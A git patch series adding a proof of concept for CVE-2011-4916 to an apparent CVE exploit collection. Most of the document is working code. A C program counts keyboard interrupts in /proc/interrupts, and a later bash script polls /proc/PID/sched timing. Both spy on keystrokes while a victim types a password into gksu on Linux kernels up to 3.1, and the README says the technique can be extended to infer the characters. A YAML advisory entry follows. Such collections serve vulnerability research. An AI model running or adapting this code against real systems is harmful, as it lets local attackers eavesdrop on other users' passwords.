From b8c8c8f29419062837350eb17665943445016bd3 Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 11:52:28 +0000 Subject: [PATCH 1/8] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2011-4916?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4916/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/CVE-2011-4916/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4916/.keep b/cve/linux-kernel/2011/CVE-2011-4916/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 2bedee0f32df7ac2593b121cd62c1b6d9a03ac01 Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 11:53:08 +0000 Subject: [PATCH 2/8] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-4916/C?= =?UTF-8?q?VE-2011-4916.c.=20=E6=8F=90=E4=BA=A4POC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: gzm --- .../2011/CVE-2011-4916/CVE-2011-4916.c | 178 ++++++++++++++++++ 1 file changed, 178 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c diff --git a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c new file mode 100644 index 00000000..949781c2 --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c @@ -0,0 +1,178 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +int i8042_number; +int ints[1024], ints_prev[1024], ints_delta[1024]; + +char buffer[1024]; + +int reread_ints(int *interrupts, int int_count, char **names) +{ + int i; + int n, c1, c2; + char s1[1024], s2[1024]; + + int interrupts_fd; + FILE *interrupts_file; + + interrupts_fd = open("/proc/interrupts", O_RDONLY); + if (interrupts_fd == -1) + err(1, "open(\"/proc/interrupts\")"); + + interrupts_file = fdopen(interrupts_fd, "r"); + if (interrupts_file == NULL) + err(1, "fdopen"); + + if (fseek(interrupts_file, 0, SEEK_SET) < 0) + err(1, "lseek"); + + fgets(buffer, sizeof(buffer), interrupts_file); + + for (i = 0; i < int_count; i++) { + if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { + fclose(interrupts_file); + return i; + } + + if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { + fclose(interrupts_file); + return i; + } + + if (names != NULL && names[i] == NULL) + names[i] = strdup(s2); + + interrupts[i] = c1 + c2; + } + + fclose(interrupts_file); + return int_count; +} + +void init_i8042_number(void) +{ + int i; + int can_be_keyboard[1024]; + char *names[1024]; + int number_of_interrups, can_be_keyboard_numbers; + + number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); + + /* + * Identify the i8042 interrupt associated with the keyboard by: + * 1) name should be i8042 + * 2) interrupts count emitted in one second shouldn't be more than 100 + */ + for (i = 0; i < number_of_interrups; i++) + can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; + + while (1) { + sleep(1); + reread_ints(ints, sizeof(ints), NULL); + + can_be_keyboard_numbers = 0; + for (i = 0; i < number_of_interrups; i++) { + can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; + if (can_be_keyboard[i]) + can_be_keyboard_numbers++; + + ints_prev[i] = ints[i]; + } + + if (can_be_keyboard_numbers == 1) { + for (i = 0; i < number_of_interrups; i++) + if (can_be_keyboard[i]) { + i8042_number = i; + printf("i8042 keyboard is #%d\n", i); + return; + } + } + } +} + +int i8042_read(void) +{ + reread_ints(ints, sizeof(ints), NULL); + ints_prev[i8042_number] = ints[i8042_number]; + + return ints[i8042_number]; +} + +int wait_for_program(char *pname) +{ + FILE *f; + int pid; + char s[1024]; + + snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" + " sleep 0.1; done", pname); + system(s); + snprintf(s, sizeof(s), "pgrep %s", pname); + f = popen(s, "r"); + if (f == NULL) + err(1, "popen"); + + if (fgets(buffer, sizeof(buffer), f) == NULL) + err(1, "fgets"); + + if (sscanf(buffer, "%d", &pid) < 1) + err(1, "sscanf"); + + pclose(f); + + return pid; +} + +int main(int argc, char *argv[]) +{ + int n, old, sum, i; + int pid; + char *pname = argv[1]; + + if (argc < 2) + errx(1, "usage: spy-interrupts gksu"); + + puts("Waiting for mouse activity..."); + init_i8042_number(); + + pid = wait_for_program(pname); + printf("%s is %d\n", pname, pid); + + old = i8042_read(); + + sum = 0; + + while (1) { + n = i8042_read(); + if (old == n) + usleep(10000); + else { + for (i = 0; i < n-old; i++) + putchar('.'); + fflush(stdout); + } + + sum += n - old; + old = n; + + if (kill(pid, 0) < 0 && errno == ESRCH) + break; + } + + /* + * #interrupts == 2 * #keystrokes. + * #keystrokes = len(password) - 1 because of ENTER after the password. + */ + printf("\n%d keystrokes\n", (sum-2)/2); + + return 0; +} \ No newline at end of file -- Gitee From 5baeea6a0cde30518990f0461915d47005ebc42e Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 11:53:20 +0000 Subject: [PATCH 3/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?linux-kernel/2011/CVE-2011-4916/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4916/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4916/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4916/.keep b/cve/linux-kernel/2011/CVE-2011-4916/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 3079bf3241f0fbd33fe8019cbbd7803ba20c7fa3 Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 11:58:01 +0000 Subject: [PATCH 4/8] =?UTF-8?q?update=20cve/linux-kernel/2011/CVE-2011-491?= =?UTF-8?q?6/CVE-2011-4916.c.=20=E4=BF=AE=E6=94=B9PoC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: gzm --- .../2011/CVE-2011-4916/CVE-2011-4916.c | 214 +++--------------- 1 file changed, 36 insertions(+), 178 deletions(-) diff --git a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c index 949781c2..addc78ce 100644 --- a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c +++ b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c @@ -1,178 +1,36 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -int i8042_number; -int ints[1024], ints_prev[1024], ints_delta[1024]; - -char buffer[1024]; - -int reread_ints(int *interrupts, int int_count, char **names) -{ - int i; - int n, c1, c2; - char s1[1024], s2[1024]; - - int interrupts_fd; - FILE *interrupts_file; - - interrupts_fd = open("/proc/interrupts", O_RDONLY); - if (interrupts_fd == -1) - err(1, "open(\"/proc/interrupts\")"); - - interrupts_file = fdopen(interrupts_fd, "r"); - if (interrupts_file == NULL) - err(1, "fdopen"); - - if (fseek(interrupts_file, 0, SEEK_SET) < 0) - err(1, "lseek"); - - fgets(buffer, sizeof(buffer), interrupts_file); - - for (i = 0; i < int_count; i++) { - if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { - fclose(interrupts_file); - return i; - } - - if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { - fclose(interrupts_file); - return i; - } - - if (names != NULL && names[i] == NULL) - names[i] = strdup(s2); - - interrupts[i] = c1 + c2; - } - - fclose(interrupts_file); - return int_count; -} - -void init_i8042_number(void) -{ - int i; - int can_be_keyboard[1024]; - char *names[1024]; - int number_of_interrups, can_be_keyboard_numbers; - - number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); - - /* - * Identify the i8042 interrupt associated with the keyboard by: - * 1) name should be i8042 - * 2) interrupts count emitted in one second shouldn't be more than 100 - */ - for (i = 0; i < number_of_interrups; i++) - can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; - - while (1) { - sleep(1); - reread_ints(ints, sizeof(ints), NULL); - - can_be_keyboard_numbers = 0; - for (i = 0; i < number_of_interrups; i++) { - can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; - if (can_be_keyboard[i]) - can_be_keyboard_numbers++; - - ints_prev[i] = ints[i]; - } - - if (can_be_keyboard_numbers == 1) { - for (i = 0; i < number_of_interrups; i++) - if (can_be_keyboard[i]) { - i8042_number = i; - printf("i8042 keyboard is #%d\n", i); - return; - } - } - } -} - -int i8042_read(void) -{ - reread_ints(ints, sizeof(ints), NULL); - ints_prev[i8042_number] = ints[i8042_number]; - - return ints[i8042_number]; -} - -int wait_for_program(char *pname) -{ - FILE *f; - int pid; - char s[1024]; - - snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" - " sleep 0.1; done", pname); - system(s); - snprintf(s, sizeof(s), "pgrep %s", pname); - f = popen(s, "r"); - if (f == NULL) - err(1, "popen"); - - if (fgets(buffer, sizeof(buffer), f) == NULL) - err(1, "fgets"); - - if (sscanf(buffer, "%d", &pid) < 1) - err(1, "sscanf"); - - pclose(f); - - return pid; -} - -int main(int argc, char *argv[]) -{ - int n, old, sum, i; - int pid; - char *pname = argv[1]; - - if (argc < 2) - errx(1, "usage: spy-interrupts gksu"); - - puts("Waiting for mouse activity..."); - init_i8042_number(); - - pid = wait_for_program(pname); - printf("%s is %d\n", pname, pid); - - old = i8042_read(); - - sum = 0; - - while (1) { - n = i8042_read(); - if (old == n) - usleep(10000); - else { - for (i = 0; i < n-old; i++) - putchar('.'); - fflush(stdout); - } - - sum += n - old; - old = n; - - if (kill(pid, 0) < 0 && errno == ESRCH) - break; - } - - /* - * #interrupts == 2 * #keystrokes. - * #keystrokes = len(password) - 1 because of ENTER after the password. - */ - printf("\n%d keystrokes\n", (sum-2)/2); - - return 0; -} \ No newline at end of file +PNAME="$1" + +while :; do + PID=`pgrep "$PNAME"` + if [ -n "$PID" ]; then + echo $PID + cd /proc/$PID/ + break + fi + sleep 1 +done + +S=0.0 +while :; do + V=`grep se.exec_start sched 2>/dev/null | cut -d: -f2-` + [ -z "$V" ] && break + if [ "$V" != "$S" ]; then + VAL=`echo "$V - $S" | bc -l` + VALI=`echo $VAL | cut -d. -f1` + [ -z "$VALI" ] && VALI=0 + + if [ "$VALI" -le 815 -a "$VALI" -ge 785 ]; then + # Cursor appeared + : + elif [ $VALI -le 415 -a $VALI -ge 385 ]; then + # Cursor disappeared + : + elif [ $VALI -ge 150 ]; then + echo "$VAL (KEY PRESSED)" + else + echo "$VAL" + fi + + S=$V + fi +done \ No newline at end of file -- Gitee From 91054df8421019c4a094e274632b42cd26fc6862 Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 12:00:48 +0000 Subject: [PATCH 5/8] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-4916/R?= =?UTF-8?q?EADME.md.=20=E6=B7=BB=E5=8A=A0README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: gzm --- cve/linux-kernel/2011/CVE-2011-4916/README.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4916/README.md diff --git a/cve/linux-kernel/2011/CVE-2011-4916/README.md b/cve/linux-kernel/2011/CVE-2011-4916/README.md new file mode 100644 index 00000000..6ca03d6e --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4916/README.md @@ -0,0 +1,14 @@ +A PoC for spying for keystrokes in gksu in Linux <= 3.1. + +/proc/$PID/{sched,schedstat} are world readable, so we can just loop +on one CPU core while the victim is executed on another, and spy for +the changes of scheduling counters. The PoC counts only keystrokes number, +but it can be easily extended to note the delays between the keystrokes +and do the statistical analysis to learn the input characters. See +e.g. "Peeping Tom in the Neighborhood: Keystroke Eavesdropping on +Multi-User Systems" by Kehuan Zhang and XiaoFeng Wang. + +It is NOT stable, it only shows a design flaw (the lack of proper +permission model of procfs debugging counters). The constants are true +for the author's system only and don't take into account other sources of +gksu CPU activity. \ No newline at end of file -- Gitee From 23153bcb92ddfd8ed49798dace429a3fdc434ad8 Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 12:02:42 +0000 Subject: [PATCH 6/8] update cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c. Signed-off-by: gzm --- .../2011/CVE-2011-4916/CVE-2011-4916.c | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c index addc78ce..df2656d1 100644 --- a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c +++ b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c @@ -1,3 +1,24 @@ +#!/bin/bash +# +# A PoC for spying for keystrokes in gksu in Linux <= 3.1. +# +# /proc/$PID/{sched,schedstat} are world readable, so we can just loop +# on one CPU core while the victim is executed on another, and spy for +# the changes of scheduling counters. The PoC counts only keystrokes number, +# but it can be easily extended to note the delays between the keystrokes +# and do the statistical analysis to learn the input characters. See +# e.g. "Peeping Tom in the Neighborhood: Keystroke Eavesdropping on +# Multi-User Systems" by Kehuan Zhang and XiaoFeng Wang. +# +# It is NOT stable, it only shows a design flaw (the lack of proper +# permission model of procfs debugging counters). The constants are true +# for the author's system only and don't take into account other sources of +# gksu CPU activity. +# +# by segoon from openwall +# +# run as: spy-sched gksu + PNAME="$1" while :; do -- Gitee From 3ca8d93de8243cbb664a6643633da68ab369cd40 Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 12:06:11 +0000 Subject: [PATCH 7/8] add cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml. Signed-off-by: gzm --- cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml new file mode 100644 index 00000000..2442cf53 --- /dev/null +++ b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml @@ -0,0 +1,18 @@ +id: CVE-2011-4916 +source: https://www.openwall.com/lists/oss-security/2011/11/05/3 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: medium + description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。 + scope-of-influence: + Linux kernel <= 3.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4916 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2011-4916 + cwe-id: CWE-200 + cnvd-id: None + kve-id: None + tags: information disclosure \ No newline at end of file -- Gitee From 441e83f7d299921dcacb449857568894003ec816 Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 12:07:29 +0000 Subject: [PATCH 8/8] update other_list.yaml. Signed-off-by: gzm --- other_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/other_list.yaml b/other_list.yaml index cf82c0bd..6280d85a 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -15,6 +15,7 @@ cve: - CVE-2023-0179 - CVE-2018-18955 - CVE-2011-4917 + - CVE-2011-4916 polkit: - CVE-2021-3560 Outlook: -- Gitee